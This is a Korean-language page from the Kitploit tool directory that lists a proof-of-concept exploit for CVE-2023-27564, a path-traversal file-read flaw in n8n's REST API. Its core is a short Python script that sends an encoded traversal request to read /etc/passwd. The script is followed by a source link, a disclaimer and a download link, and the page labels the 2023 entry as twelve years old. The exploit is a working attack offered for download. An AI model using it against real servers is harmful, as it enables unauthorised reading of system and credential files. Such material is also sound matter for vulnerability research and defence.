Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
exploit-CVE-2023-27564 — REST API의 경로 탐색을 통해 n8n에서 익명 파일 읽기를 가능하게 하는 CVE-2023-27564용 개념 증명 익스플로잇입니다. 보안 연구 및 취약점 평가를 위해 설계되었습니다. | Kitploit
도구/GitHubGitHub/david-botelho-mariano/exploit-cve-2023-27564
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubdavid-botelho-mariano/exploit-cve-2023-27564

exploit-CVE-2023-27564

REST API의 경로 탐색을 통해 n8n에서 익명 파일 읽기를 가능하게 하는 CVE-2023-27564용 개념 증명 익스플로잇입니다. 보안 연구 및 취약점 평가를 위해 설계되었습니다.

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-27564에 대한 익스플로잇

이 취약점은 n8n에서 익명 파일 읽기를 허용합니다.

root@kitploit:~
import requests

url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"

response = requests.get(url)

print(response.status_code)
print(response.headers)
print(response.text)

출처

https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf

면책 조항

이 저장소에 제공된 개념 증명(PoC)은 교육 및 보안 연구 목적으로만 제공됩니다. 정보와 코드는 사이버 보안 전문가와 연구자가 소프트웨어 및 시스템의 취약점을 이해하고 보호하기 위해 사용되어야 합니다. 사전 상호 동의 없이 대상을 공격하기 위해 이 PoC, 관련 정보 또는 코드를 사용하는 것은 불법이며 엄격히 금지됩니다.

이 PoC를 사용함으로써, 귀하는 이 PoC가 시연하는 취약점의 잠재적 영향을 이해하고 있으며 이를 책임감 있고 윤리적으로 사용할 것에 동의합니다. 이 PoC의 저자는 이 자료의 오용이나 제공된 정보 및 코드 사용으로 인해 발생할 수 있는 모든 손해에 대한 책임을 부인합니다. 최종 사용자는 모든 관련 지역, 주, 국가 및 국제 법률을 준수할 책임이 있습니다.

저자는 이 저장소에 제공된 정보의 정확성과 신뢰성을 보장하기 위해 최선을 다했습니다. 그러나 정보는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다. 저자는 포함된 정보의 정확성, 내용, 완전성, 법적 적합성 또는 신뢰성에 대한 책임이나 의무를 지지 않습니다.

도구 다운로드